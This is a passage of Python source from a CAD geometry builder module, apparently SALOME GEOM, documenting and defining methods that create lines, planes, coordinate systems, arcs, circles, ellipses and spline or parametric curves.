# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref tui_creation_line "Example"
@ManageTransactions("BasicOp")
def MakeLine(self, thePnt, theDir, theName=None):
"""
Create a line, passing through the given point
and parallel to the given direction
Parameters:
thePnt Point. The resulting line will pass through it.
theDir Direction. The resulting line will be parallel to it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLine(thePnt, theDir)
RaiseIfFailed("MakeLine", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a line, passing through the given points
# @param thePnt1 First of two points, defining the line.
# @param thePnt2 Second of two points, defining the line.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref tui_creation_line "Example"
@ManageTransactions("BasicOp")
def MakeLineTwoPnt(self, thePnt1, thePnt2, theName=None):
"""
Create a line, passing through the given points
Parameters:
thePnt1 First of two points, defining the line.
thePnt2 Second of two points, defining the line.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
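Example of usage (illustrative; p1 and p2 are assumed, previously created points):
line_1 = geompy.MakeLineTwoPnt(p1, p2)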
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLineTwoPnt(thePnt1, thePnt2)
RaiseIfFailed("MakeLineTwoPnt", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a line on two faces intersection.
# @param theFace1 First of two faces, defining the line.
# @param theFace2 Second of two faces, defining the line.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created line.
#
# @ref swig_MakeLineTwoFaces "Example"
@ManageTransactions("BasicOp")
def MakeLineTwoFaces(self, theFace1, theFace2, theName=None):
"""
Create a line on two faces intersection.
Parameters:
theFace1 First of two faces, defining the line.
theFace2 Second of two faces, defining the line.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created line.
"""
# Example: see GEOM_TestAll.py
anObj = self.BasicOp.MakeLineTwoFaces(theFace1, theFace2)
RaiseIfFailed("MakeLineTwoFaces", self.BasicOp)
self._autoPublish(anObj, theName, "line")
return anObj
## Create a plane, passing through the given point
# and normal to the given vector.
# @param thePnt Point, the plane has to pass through.
# @param theVec Vector, defining the plane normal direction.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlane(self, thePnt, theVec, theTrimSize, theName=None):
"""
Create a plane, passing through the given point
and normal to the given vector.
Parameters:
thePnt Point, the plane has to pass through.
theVec Vector, defining the plane normal direction.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
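Example of usage (illustrative; p1 and v_z are assumed, previously created point and normal vector):
plane_1 = geompy.MakePlane(p1, v_z, 200.)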
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize)
anObj = self.BasicOp.MakePlanePntVec(thePnt, theVec, theTrimSize)
RaiseIfFailed("MakePlanePntVec", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, passing through the three given points
# @param thePnt1 First of three points, defining the plane.
# @param thePnt2 Second of three points, defining the plane.
# @param thePnt3 Third of three points, defining the plane.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneThreePnt(self, thePnt1, thePnt2, thePnt3, theTrimSize, theName=None):
"""
Create a plane, passing through the three given points
Parameters:
thePnt1 First of three points, defining the plane.
thePnt2 Second of three points, defining the plane.
thePnt3 Third of three points, defining the plane.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
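Example of usage (illustrative; p1, p2 and p3 are assumed, previously created points):
plane_2 = geompy.MakePlaneThreePnt(p1, p2, p3, 200.)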
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize)
anObj = self.BasicOp.MakePlaneThreePnt(thePnt1, thePnt2, thePnt3, theTrimSize)
RaiseIfFailed("MakePlaneThreePnt", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, similar to the existing one, but with another size of representing face.
# @param theFace Referenced plane or LCS(Marker).
# @param theTrimSize New half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneFace(self, theFace, theTrimSize, theName=None):
"""
Create a plane, similar to the existing one, but with another size of representing face.
Parameters:
theFace Referenced plane or LCS(Marker).
theTrimSize New half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize)
anObj = self.BasicOp.MakePlaneFace(theFace, theTrimSize)
RaiseIfFailed("MakePlaneFace", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, passing through the 2 vectors
# with the center at the start point of the first vector.
# @param theVec1 Vector, defining center point and plane direction.
# @param theVec2 Vector, defining the plane normal direction.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlane2Vec(self, theVec1, theVec2, theTrimSize, theName=None):
"""
Create a plane, passing through the 2 vectors
with the center at the start point of the first vector.
Parameters:
theVec1 Vector, defining center point and plane direction.
theVec2 Vector, defining the plane normal direction.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize)
anObj = self.BasicOp.MakePlane2Vec(theVec1, theVec2, theTrimSize)
RaiseIfFailed("MakePlane2Vec", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a plane, based on a Local coordinate system.
# @param theLCS coordinate system, defining plane.
# @param theTrimSize Half size of a side of quadrangle face, representing the plane.
# @param theOrientation OXY, OYZ or OZX orientation - (1, 2 or 3)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created plane.
#
# @ref tui_creation_plane "Example"
@ManageTransactions("BasicOp")
def MakePlaneLCS(self, theLCS, theTrimSize, theOrientation, theName=None):
"""
Create a plane, based on a Local coordinate system.
Parameters:
theLCS coordinate system, defining plane.
theTrimSize Half size of a side of quadrangle face, representing the plane.
theOrientation OXY, OYZ or OZX orientation - (1, 2 or 3)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created plane.
"""
# Example: see GEOM_TestAll.py
theTrimSize, Parameters = ParseParameters(theTrimSize)
anObj = self.BasicOp.MakePlaneLCS(theLCS, theTrimSize, theOrientation)
RaiseIfFailed("MakePlaneLCS", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "plane")
return anObj
## Create a local coordinate system.
# @param OX,OY,OZ Three coordinates of coordinate system origin.
# @param XDX,XDY,XDZ Three components of OX direction
# @param YDX,YDY,YDZ Three components of OY direction
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref swig_MakeMarker "Example"
@ManageTransactions("BasicOp")
def MakeMarker(self, OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ, theName=None):
"""
Create a local coordinate system.
Parameters:
OX,OY,OZ Three coordinates of coordinate system origin.
XDX,XDY,XDZ Three components of OX direction
YDX,YDY,YDZ Three components of OY direction
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
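Example of usage (an illustrative sketch, reproducing the global coordinate system):
LCS_1 = geompy.MakeMarker(0,0,0, 1,0,0, 0,1,0)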
"""
# Example: see GEOM_TestAll.py
OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ, Parameters = ParseParameters(OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ)
anObj = self.BasicOp.MakeMarker(OX,OY,OZ, XDX,XDY,XDZ, YDX,YDY,YDZ)
RaiseIfFailed("MakeMarker", self.BasicOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "lcs")
return anObj
## Create a local coordinate system from shape.
# @param theShape The initial shape to detect the coordinate system.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref tui_creation_lcs "Example"
@ManageTransactions("BasicOp")
def MakeMarkerFromShape(self, theShape, theName=None):
"""
Create a local coordinate system from shape.
Parameters:
theShape The initial shape to detect the coordinate system.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
"""
anObj = self.BasicOp.MakeMarkerFromShape(theShape)
RaiseIfFailed("MakeMarkerFromShape", self.BasicOp)
self._autoPublish(anObj, theName, "lcs")
return anObj
## Create a local coordinate system from point and two vectors.
# @param theOrigin Point of coordinate system origin.
# @param theXVec Vector of X direction
# @param theYVec Vector of Y direction
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created coordinate system.
#
# @ref tui_creation_lcs "Example"
@ManageTransactions("BasicOp")
def MakeMarkerPntTwoVec(self, theOrigin, theXVec, theYVec, theName=None):
"""
Create a local coordinate system from point and two vectors.
Parameters:
theOrigin Point of coordinate system origin.
theXVec Vector of X direction
theYVec Vector of Y direction
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created coordinate system.
"""
anObj = self.BasicOp.MakeMarkerPntTwoVec(theOrigin, theXVec, theYVec)
RaiseIfFailed("MakeMarkerPntTwoVec", self.BasicOp)
self._autoPublish(anObj, theName, "lcs")
return anObj
# end of l3_basic_go
## @}
## @addtogroup l4_curves
## @{
## Create an arc of circle, passing through three given points.
# @param thePnt1 Start point of the arc.
# @param thePnt2 Middle point of the arc.
# @param thePnt3 End point of the arc.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArc(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create an arc of circle, passing through three given points.
Parameters:
thePnt1 Start point of the arc.
thePnt2 Middle point of the arc.
thePnt3 End point of the arc.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
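Example of usage (illustrative; p1, p2 and p3 are assumed, previously created points):
arc_1 = geompy.MakeArc(p1, p2, p3)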
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArc(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeArc", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create an arc of circle from a center and 2 points.
# @param thePnt1 Center of the arc
# @param thePnt2 Start point of the arc. (Gives also the radius of the arc)
# @param thePnt3 End point of the arc (Gives also a direction)
# @param theSense Orientation of the arc
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArcCenter(self, thePnt1, thePnt2, thePnt3, theSense=False, theName=None):
"""
Create an arc of circle from a center and 2 points.
Parameters:
thePnt1 Center of the arc
thePnt2 Start point of the arc. (Gives also the radius of the arc)
thePnt3 End point of the arc (Gives also a direction)
theSense Orientation of the arc
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
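Example of usage (illustrative; pc, p1 and p2 are assumed, previously created points):
arc_2 = geompy.MakeArcCenter(pc, p1, p2, False)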
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArcCenter(thePnt1, thePnt2, thePnt3, theSense)
RaiseIfFailed("MakeArcCenter", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create an arc of ellipse, of center and two points.
# @param theCenter Center of the arc.
# @param thePnt1 defines the major radius of the arc as the distance from theCenter to thePnt1.
# @param thePnt2 defines the plane of the ellipse, and the minor radius as the distance from thePnt2 to the line through theCenter and thePnt1.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created arc.
#
# @ref swig_MakeArc "Example"
@ManageTransactions("CurvesOp")
def MakeArcOfEllipse(self, theCenter, thePnt1, thePnt2, theName=None):
"""
Create an arc of ellipse, of center and two points.
Parameters:
theCenter Center of the arc.
thePnt1 defines the major radius of the arc as the distance from theCenter to thePnt1.
thePnt2 defines the plane of the ellipse, and the minor radius as the distance from thePnt2 to the line through theCenter and thePnt1.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created arc.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeArcOfEllipse(theCenter, thePnt1, thePnt2)
RaiseIfFailed("MakeArcOfEllipse", self.CurvesOp)
self._autoPublish(anObj, theName, "arc")
return anObj
## Create a circle with given center, normal vector and radius.
# @param thePnt Circle center.
# @param theVec Vector, normal to the plane of the circle.
# @param theR Circle radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref tui_creation_circle "Example"
@ManageTransactions("CurvesOp")
def MakeCircle(self, thePnt, theVec, theR, theName=None):
"""
Create a circle with given center, normal vector and radius.
Parameters:
thePnt Circle center.
theVec Vector, normal to the plane of the circle.
theR Circle radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
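Example of usage (illustrative; p1 and v_z are assumed, previously created point and vector):
circle_1 = geompy.MakeCircle(p1, v_z, 50.)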
"""
# Example: see GEOM_TestAll.py
theR, Parameters = ParseParameters(theR)
anObj = self.CurvesOp.MakeCirclePntVecR(thePnt, theVec, theR)
RaiseIfFailed("MakeCirclePntVecR", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle with given radius.
# Center of the circle will be at the origin of the global
# coordinate system and the normal vector will be codirected with the Z axis
# @param theR Circle radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
@ManageTransactions("CurvesOp")
def MakeCircleR(self, theR, theName=None):
"""
Create a circle with given radius.
Center of the circle will be at the origin of the global
coordinate system and the normal vector will be codirected with the Z axis
Parameters:
theR Circle radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
anObj = self.CurvesOp.MakeCirclePntVecR(None, None, theR)
RaiseIfFailed("MakeCirclePntVecR", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle, passing through three given points
# @param thePnt1,thePnt2,thePnt3 Points, defining the circle.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref tui_creation_circle "Example"
@ManageTransactions("CurvesOp")
def MakeCircleThreePnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a circle, passing through three given points
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the circle.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeCircleThreePnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeCircleThreePnt", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create a circle, with given point1 as center,
# passing through the point2 as radius and laying in the plane,
# defined by all three given points.
# @param thePnt1,thePnt2,thePnt3 Points, defining the circle.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created circle.
#
# @ref swig_MakeCircle "Example"
@ManageTransactions("CurvesOp")
def MakeCircleCenter2Pnt(self, thePnt1, thePnt2, thePnt3, theName=None):
"""
Create a circle, with given point1 as center,
passing through the point2 as radius and laying in the plane,
defined by all three given points.
Parameters:
thePnt1,thePnt2,thePnt3 Points, defining the circle.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created circle.
"""
# Example: see GEOM_example6.py
anObj = self.CurvesOp.MakeCircleCenter2Pnt(thePnt1, thePnt2, thePnt3)
RaiseIfFailed("MakeCircleCenter2Pnt", self.CurvesOp)
self._autoPublish(anObj, theName, "circle")
return anObj
## Create an ellipse with given center, normal vector and radii.
# @param thePnt Ellipse center.
# @param theVec Vector, normal to the plane of the ellipse.
# @param theRMajor Major ellipse radius.
# @param theRMinor Minor ellipse radius.
# @param theVecMaj Vector, direction of the ellipse's main axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created ellipse.
#
# @ref tui_creation_ellipse "Example"
@ManageTransactions("CurvesOp")
def MakeEllipse(self, thePnt, theVec, theRMajor, theRMinor, theVecMaj=None, theName=None):
"""
Create an ellipse with given center, normal vector and radii.
Parameters:
thePnt Ellipse center.
theVec Vector, normal to the plane of the ellipse.
theRMajor Major ellipse radius.
theRMinor Minor ellipse radius.
theVecMaj Vector, direction of the ellipse's main axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created ellipse.
"""
# Example: see GEOM_TestAll.py
theRMajor, theRMinor, Parameters = ParseParameters(theRMajor, theRMinor)
if theVecMaj is not None:
anObj = self.CurvesOp.MakeEllipseVec(thePnt, theVec, theRMajor, theRMinor, theVecMaj)
else:
anObj = self.CurvesOp.MakeEllipse(thePnt, theVec, theRMajor, theRMinor)
pass
RaiseIfFailed("MakeEllipse", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "ellipse")
return anObj
## Create an ellipse with given radii.
# Center of the ellipse will be at the origin of the global
# coordinate system and the normal vector will be codirected with the Z axis
# @param theRMajor Major ellipse radius.
# @param theRMinor Minor ellipse radius.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created ellipse.
@ManageTransactions("CurvesOp")
def MakeEllipseRR(self, theRMajor, theRMinor, theName=None):
"""
Create an ellipse with given radii.
Center of the ellipse will be at the origin of the global
coordinate system and the normal vector will be codirected with the Z axis
Parameters:
theRMajor Major ellipse radius.
theRMinor Minor ellipse radius.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created ellipse.
"""
anObj = self.CurvesOp.MakeEllipse(None, None, theRMajor, theRMinor)
RaiseIfFailed("MakeEllipse", self.CurvesOp)
self._autoPublish(anObj, theName, "ellipse")
return anObj
## Create a polyline on the set of points.
# @param thePoints Sequence of points for the polyline.
# @param theIsClosed If True, build a closed wire.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created polyline.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakePolyline(self, thePoints, theIsClosed=False, theName=None):
"""
Create a polyline on the set of points.
Parameters:
thePoints Sequence of points for the polyline.
theIsClosed If True, build a closed wire.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created polyline.
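Example of usage (illustrative; p1..p4 are assumed, previously created points):
polyline_1 = geompy.MakePolyline([p1, p2, p3, p4], theIsClosed=True)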
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakePolyline(thePoints, theIsClosed)
RaiseIfFailed("MakePolyline", self.CurvesOp)
self._autoPublish(anObj, theName, "polyline")
return anObj
## Create a Bezier curve on the set of points.
# @param thePoints Sequence of points for the bezier curve.
# @param theIsClosed If True, build a closed curve.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created bezier curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeBezier(self, thePoints, theIsClosed=False, theName=None):
"""
Create a Bezier curve on the set of points.
Parameters:
thePoints Sequence of points for the bezier curve.
theIsClosed If True, build a closed curve.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created bezier curve.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineBezier(thePoints, theIsClosed)
RaiseIfFailed("MakeSplineBezier", self.CurvesOp)
self._autoPublish(anObj, theName, "bezier")
return anObj
## Create B-Spline curve on the set of points.
# @param thePoints Sequence of points for the B-Spline curve.
# @param theIsClosed If True, build a closed curve.
# @param theDoReordering If True, the algorithm does not follow the order of
# \a thePoints but searches for the closest vertex.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created B-Spline curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeInterpol(self, thePoints, theIsClosed=False, theDoReordering=False, theName=None):
"""
Create B-Spline curve on the set of points.
Parameters:
thePoints Sequence of points for the B-Spline curve.
theIsClosed If True, build a closed curve.
theDoReordering If True, the algorithm does not follow the order of
thePoints but searches for the closest vertex.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created B-Spline curve.
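Example of usage (illustrative; p1..p4 are assumed, previously created points):
bspline_1 = geompy.MakeInterpol([p1, p2, p3, p4], False, False)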
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineInterpolation(thePoints, theIsClosed, theDoReordering)
RaiseIfFailed("MakeInterpol", self.CurvesOp)
self._autoPublish(anObj, theName, "bspline")
return anObj
## Create B-Spline curve on the set of points.
# @param thePoints Sequence of points for the B-Spline curve.
# @param theFirstVec Vector object, defining the curve direction at its first point.
# @param theLastVec Vector object, defining the curve direction at its last point.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created B-Spline curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeInterpolWithTangents(self, thePoints, theFirstVec, theLastVec, theName=None):
"""
Create B-Spline curve on the set of points.
Parameters:
thePoints Sequence of points for the B-Spline curve.
theFirstVec Vector object, defining the curve direction at its first point.
theLastVec Vector object, defining the curve direction at its last point.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created B-Spline curve.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeSplineInterpolWithTangents(thePoints, theFirstVec, theLastVec)
RaiseIfFailed("MakeInterpolWithTangents", self.CurvesOp)
self._autoPublish(anObj, theName, "bspline")
return anObj
## Creates a curve using the parametric definition of the basic points.
# @param thexExpr parametric equation of the X coordinate.
# @param theyExpr parametric equation of the Y coordinate.
# @param thezExpr parametric equation of the Z coordinate.
# @param theParamMin the minimal value of the parameter.
# @param theParamMax the maximum value of the parameter.
# @param theParamStep the number of steps if theNewMethod = True, else step value of the parameter.
# @param theCurveType the type of the curve,
# one of GEOM.Polyline, GEOM.Bezier, GEOM.Interpolation.
# @param theNewMethod flag for switching to the new method. If the flag is set to False, a deprecated method is used, which can lead to a bug.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created curve.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeCurveParametric(self, thexExpr, theyExpr, thezExpr,
theParamMin, theParamMax, theParamStep, theCurveType, theNewMethod=False, theName=None ):
"""
Creates a curve using the parametric definition of the basic points.
Parameters:
thexExpr parametric equation of the X coordinate.
theyExpr parametric equation of the Y coordinate.
thezExpr parametric equation of the Z coordinate.
theParamMin the minimal value of the parameter.
theParamMax the maximum value of the parameter.
theParamStep the number of steps if theNewMethod = True, else step value of the parameter.
theCurveType the type of the curve,
one of GEOM.Polyline, GEOM.Bezier, GEOM.Interpolation.
theNewMethod flag for switching to the new method. If the flag is set to False,
a deprecated method is used, which can lead to a bug.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created curve.
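Example of usage (an illustrative spiral sketch; assumes the GEOM module is available for the curve type constants):
spiral = geompy.MakeCurveParametric("t*cos(t)", "t*sin(t)", "t", 0., 20., 100, GEOM.Interpolation, theNewMethod=True)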
"""
theParamMin,theParamMax,theParamStep,Parameters = ParseParameters(theParamMin,theParamMax,theParamStep)
if theNewMethod:
anObj = self.CurvesOp.MakeCurveParametricNew(thexExpr,theyExpr,thezExpr,theParamMin,theParamMax,theParamStep,theCurveType)
else:
anObj = self.CurvesOp.MakeCurveParametric(thexExpr,theyExpr,thezExpr,theParamMin,theParamMax,theParamStep,theCurveType)
RaiseIfFailed("MakeSplineInterpolation", self.CurvesOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "curve")
return anObj
## Create an isoline curve on a face.
# @param theFace the face for which an isoline is created.
# @param IsUIsoline True for U-isoline creation; False for V-isoline
# creation.
# @param theParameter the U parameter for U-isoline or V parameter
# for V-isoline.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the created isoline edge or
# a compound of edges.
#
# @ref tui_creation_curve "Example"
@ManageTransactions("CurvesOp")
def MakeIsoline(self, theFace, IsUIsoline, theParameter, theName=None):
"""
Create an isoline curve on a face.
Parameters:
theFace the face for which an isoline is created.
IsUIsoline True for U-isoline creation; False for V-isoline
creation.
theParameter the U parameter for U-isoline or V parameter
for V-isoline.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the created isoline edge or a
compound of edges.
"""
# Example: see GEOM_TestAll.py
anObj = self.CurvesOp.MakeIsoline(theFace, IsUIsoline, theParameter)
RaiseIfFailed("MakeIsoline", self.CurvesOp)
if IsUIsoline:
self._autoPublish(anObj, theName, "U-Isoline")
else:
self._autoPublish(anObj, theName, "V-Isoline")
return anObj
# end of l4_curves
## @}
## @addtogroup l3_sketcher
## @{
